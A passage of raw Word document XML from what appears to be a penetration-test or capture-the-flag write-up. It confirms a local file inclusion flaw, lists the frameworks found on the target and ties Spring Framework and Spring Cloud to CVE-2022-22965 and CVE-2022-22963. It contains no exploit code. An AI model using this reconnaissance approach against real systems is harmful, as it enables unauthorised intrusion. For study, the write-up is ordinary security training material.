              <wp:posOffset>45720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>20955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3354070"/>
            <wp:effectExtent l="0" t="0" r="254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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D170FDF" w14:textId="77777777" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7AF2E7" w14:textId="0E5781ED" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B06D35C" w14:textId="2DFA1EF1" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F81C735" w14:textId="5A8117E5" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257E9EAF" w14:textId="059A6809" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F95C730" w14:textId="00072C79" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E41BBA1" w14:textId="2AC7E6A2" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E79F7B" w14:textId="3DDE083A" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09EE6B0C" w14:textId="1A8D53E6" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD85C4C" w14:textId="19599CDD" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE3882E" w14:textId="3CEC0189" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4503C0C8" w14:textId="3C079498" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DC6031" w14:textId="6662EA86" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCC15C1" w14:textId="5F6B8FB6" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C752A09" w14:textId="75DA6AD7" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5741B68F" w14:textId="0F0580EA" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612F593D" w14:textId="707F56E5" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603571F2" w14:textId="7D613A56" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1607E4E3" w14:textId="08B8309E" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">And here we see that there is indeed a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>lfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuln here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2DC1E4" w14:textId="1E789F6F" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14892E88" w14:textId="7C08F02E" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Explore all the files u can read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268FB4C" w14:textId="3F114251" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="680B8F53" wp14:editId="1429FD69">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>18415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3549015"/>
            <wp:effectExtent l="0" t="0" r="254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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D6E8A" w14:textId="29EB72C6" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489ED04C" w14:textId="4FCCFA8E" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B4ECAF" w14:textId="08E8B9EA" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6330EC4B" w14:textId="66E5F27A" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E942E7B" w14:textId="35C7D756" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9CCFFD" w14:textId="70E3FD44" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75780A2B" w14:textId="192B0630" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22992EF0" w14:textId="69AA7C4F" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6FDBB5" w14:textId="7A4C9600" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672389BD" w14:textId="59680EB8" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08099ABD" w14:textId="7381FBBB" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA3222D" w14:textId="79631241" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C035C1" w14:textId="30DB2DEB" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637D4D10" w14:textId="59023D98" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4601E7CE" w14:textId="52269FC7" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECC7C3F" w14:textId="75C74663" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E44B6F" w14:textId="692ECABF" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4324F11B" w14:textId="7B426BFA" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E35477D" w14:textId="1D044F05" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495826AB" w14:textId="34103146" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Here we’ve found the file that contains all the frameworks a</w:t>
      </w:r>
      <w:r w:rsidR="005F35F3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nd software with their versions that the website is making use of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F167B" w14:textId="16BED91F" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A1D655F" wp14:editId="69AB963C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>822960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>251460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2964180" cy="441960"/>
            <wp:effectExtent l="0" t="0" r="762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4180" cy="441960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The 4 we’ve found in the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F2E10" w14:textId="329C3648" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDB2E97" w14:textId="3A88E450" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30ABA150" w14:textId="5FD7C779" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1404CA07" wp14:editId="604A7064">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>792480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>248285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2377440" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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487680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Maven Apache 4.0.0, which is has no known </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>vulnerablitlies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="778304CF" w14:textId="740C48E4" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16554E2A" w14:textId="2D2741BA" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5611451A" w14:textId="138A83DB" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="699095EF" wp14:editId="7C2A709B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>685800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>267335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3558540" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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8540" cy="396240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Java 11, which also has no know issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEE0704" w14:textId="43F1194D" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13646BAA" w14:textId="170CD327" w:rsidR="005F35F3" w:rsidRDefault="005F35F3" w:rsidP="005F35F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620D43CD" w14:textId="0BE2A22E" w:rsidR="005F35F3" w:rsidRDefault="00701D39" w:rsidP="005F35F3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45856B35" wp14:editId="70073FE4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>769620</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3383280" cy="693420"/>
            <wp:effectExtent l="0" t="0" r="7620"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693420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005F35F3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Framework 2.6.5 which has a known vulnerability: </w:t>
      </w:r>
      <w:r w:rsidRPr="00701D39">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cve-2022-22965</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670FA4A4" w14:textId="10746A9F" w:rsidR="00701D39" w:rsidRDefault="00701D39" w:rsidP="00701D39">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2B1A2B" w14:textId="594C85E4" w:rsidR="00701D39" w:rsidRDefault="00701D39" w:rsidP="00701D39">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B95F55" w14:textId="4D8B221C" w:rsidR="00701D39" w:rsidRDefault="00701D39" w:rsidP="00701D39">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0066F5F8" w14:textId="5E3E5FD2" w:rsidR="00701D39" w:rsidRDefault="00701D39" w:rsidP="00701D39">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Spring Cloud 3.2.2 which also has a known vulnerability: cve-2022-22963</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EEE53E" w14:textId="25E309AE" w:rsidR="00701D39" w:rsidRDefault="00701D39" w:rsidP="00701D39">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F71295" w14:textId="68ACBD36" w:rsidR="00701D39" w:rsidRDefault="00701D39" w:rsidP="00701D39">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Understanding CVE-2022-22965</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3AFD0" w14:textId="6A43A30F" w:rsidR="00941359" w:rsidRDefault="00941359" w:rsidP="00941359">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Targets effected by it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD368CB" w14:textId="78B3F45C" w:rsidR="00941359" w:rsidRDefault="00941359" w:rsidP="00941359">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Targets that use vulnerable spring framework with the web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>mvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> part included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB278CA" w14:textId="6522DEA3" w:rsidR="00BC2085" w:rsidRDefault="00BC2085" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Spring Web MVC - This is a module of the Spring Framework that provides support for building web applications using the model-view-controller (MVC) architecture. Spring Web MVC provides a powerful framework for building web-based applications with a flexible, extensible architecture that supports a wide range of web-based use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D5E16" w14:textId="60012010" w:rsidR="00941359" w:rsidRDefault="00941359" w:rsidP="00941359">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Targets also running Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637EC3E" w14:textId="14DCE117" w:rsidR="00BC2085" w:rsidRDefault="00BC2085" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>using Java alongside the Spring Framework Web MVC and REST API can provide access to a mature and stable language ecosystem, strong support for object-oriented programming, a wide range of libraries and frameworks, and support for multithreading and concurrency, making it a popular choice for building enterprise-grade applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D07CFB" w14:textId="68A80C03" w:rsidR="00941359" w:rsidRDefault="00941359" w:rsidP="00941359">
